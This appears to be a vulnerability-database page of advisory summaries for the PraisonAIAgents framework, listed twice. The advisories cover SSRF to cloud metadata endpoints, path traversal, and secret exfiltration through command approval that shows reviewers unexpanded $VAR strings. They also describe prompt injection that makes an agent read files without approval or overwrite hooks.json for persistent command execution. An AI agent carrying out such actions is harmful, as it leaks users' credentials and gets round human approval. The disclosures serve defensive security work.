Praisonaiagents
Monthly
Server-Side Request Forgery (SSRF) in PraisonAIAgents versions prior to 1.5.128 allows unauthenticated attackers to manipulate LLM agents into crawling arbitrary internal URLs. The httpx fallback crawler accepts user-supplied URLs without host validation and follows redirects, enabling access to cloud metadata endpoints (169.254.169.254), internal services, and localhost. Response content is returned to the agent and may be exposed in attacker-visible output. This vulnerability is the default behavior on fresh installations without Tavily API keys or Crawl4AI dependencies. No public exploit identified at time of analysis.
Environment variable exfiltration in PraisonAIAgents versions prior to 1.5.128 allows unauthenticated remote attackers to steal secrets (database credentials, API keys, cloud access keys) through shell_tools.py execute_command function. The vulnerability leverages deceptive command approval where unexpanded $VAR references shown to human reviewers differ from executed commands containing expanded environment variable values. Requires user interaction. No public exploit identified at time of analysis.
PraisonAIAgents versions prior to 1.5.128 allow unauthenticated remote attackers to enumerate arbitrary files on the filesystem by exploiting unvalidated glob patterns in the list_files() tool. An attacker can use relative path traversal sequences (../) within the glob pattern parameter to bypass workspace directory boundary checks, revealing file metadata including existence, names, sizes, and timestamps for any path accessible to the application process. This information disclosure vulnerability has a CVSS score of 5.3 (low/medium impact) and no public exploit code has been identified.
Server-side request forgery in PraisonAIAgents multi-agent system allows authenticated attackers to force internal network reconnaissance and data exfiltration through unvalidated URL crawling. The web_crawl() function in versions prior to 1.5.128 accepts arbitrary URLs from AI agents without scheme allowlisting, hostname blocking, or private network checks, enabling access to cloud metadata endpoints (AWS/Azure/GCP), internal services, and local filesystems via file:// URIs. Exploitation requires low-privileged authenticated access with network reachability and no user interaction. No public exploit identified at time of analysis.
PraisonAIAgents versions prior to 1.5.128 allow unauthenticated local attackers to read arbitrary files from the filesystem via the read_skill_file() function in skill_tools.py, which lacks the workspace boundary protections and approval requirements enforced by comparable file access functions. An agent subjected to prompt injection can exfiltrate sensitive files without user awareness or approval prompts, enabling confidentiality compromise with CVSS 6.2 (local attack vector, high confidentiality impact). No public exploit code or active exploitation has been reported at the time of analysis.
Command injection in PraisonAIAgents memory hooks executor allows authenticated local attackers to execute arbitrary shell commands through unsanitized user input passed to subprocess.run() with shell=True. Affects versions prior to 1.5.128. Two attack vectors exist: direct exploitation via hook configuration (pre_run_command/post_run_command) and automated exploitation through .praisonai/hooks.json lifecycle hooks (BEFORE_TOOL/AFTER_TOOL). Agent prompt injection enables persistent compromise by overwriting hooks.json, executing payloads silently at every lifecycle event without user interaction. No public exploit identified at time of analysis.
Server-Side Request Forgery (SSRF) in PraisonAIAgents versions prior to 1.5.128 allows unauthenticated attackers to manipulate LLM agents into crawling arbitrary internal URLs. The httpx fallback crawler accepts user-supplied URLs without host validation and follows redirects, enabling access to cloud metadata endpoints (169.254.169.254), internal services, and localhost. Response content is returned to the agent and may be exposed in attacker-visible output. This vulnerability is the default behavior on fresh installations without Tavily API keys or Crawl4AI dependencies. No public exploit identified at time of analysis.
Environment variable exfiltration in PraisonAIAgents versions prior to 1.5.128 allows unauthenticated remote attackers to steal secrets (database credentials, API keys, cloud access keys) through shell_tools.py execute_command function. The vulnerability leverages deceptive command approval where unexpanded $VAR references shown to human reviewers differ from executed commands containing expanded environment variable values. Requires user interaction. No public exploit identified at time of analysis.
PraisonAIAgents versions prior to 1.5.128 allow unauthenticated remote attackers to enumerate arbitrary files on the filesystem by exploiting unvalidated glob patterns in the list_files() tool. An attacker can use relative path traversal sequences (../) within the glob pattern parameter to bypass workspace directory boundary checks, revealing file metadata including existence, names, sizes, and timestamps for any path accessible to the application process. This information disclosure vulnerability has a CVSS score of 5.3 (low/medium impact) and no public exploit code has been identified.
Server-side request forgery in PraisonAIAgents multi-agent system allows authenticated attackers to force internal network reconnaissance and data exfiltration through unvalidated URL crawling. The web_crawl() function in versions prior to 1.5.128 accepts arbitrary URLs from AI agents without scheme allowlisting, hostname blocking, or private network checks, enabling access to cloud metadata endpoints (AWS/Azure/GCP), internal services, and local filesystems via file:// URIs. Exploitation requires low-privileged authenticated access with network reachability and no user interaction. No public exploit identified at time of analysis.
PraisonAIAgents versions prior to 1.5.128 allow unauthenticated local attackers to read arbitrary files from the filesystem via the read_skill_file() function in skill_tools.py, which lacks the workspace boundary protections and approval requirements enforced by comparable file access functions. An agent subjected to prompt injection can exfiltrate sensitive files without user awareness or approval prompts, enabling confidentiality compromise with CVSS 6.2 (local attack vector, high confidentiality impact). No public exploit code or active exploitation has been reported at the time of analysis.
Command injection in PraisonAIAgents memory hooks executor allows authenticated local attackers to execute arbitrary shell commands through unsanitized user input passed to subprocess.run() with shell=True. Affects versions prior to 1.5.128. Two attack vectors exist: direct exploitation via hook configuration (pre_run_command/post_run_command) and automated exploitation through .praisonai/hooks.json lifecycle hooks (BEFORE_TOOL/AFTER_TOOL). Agent prompt injection enables persistent compromise by overwriting hooks.json, executing payloads silently at every lifecycle event without user interaction. No public exploit identified at time of analysis.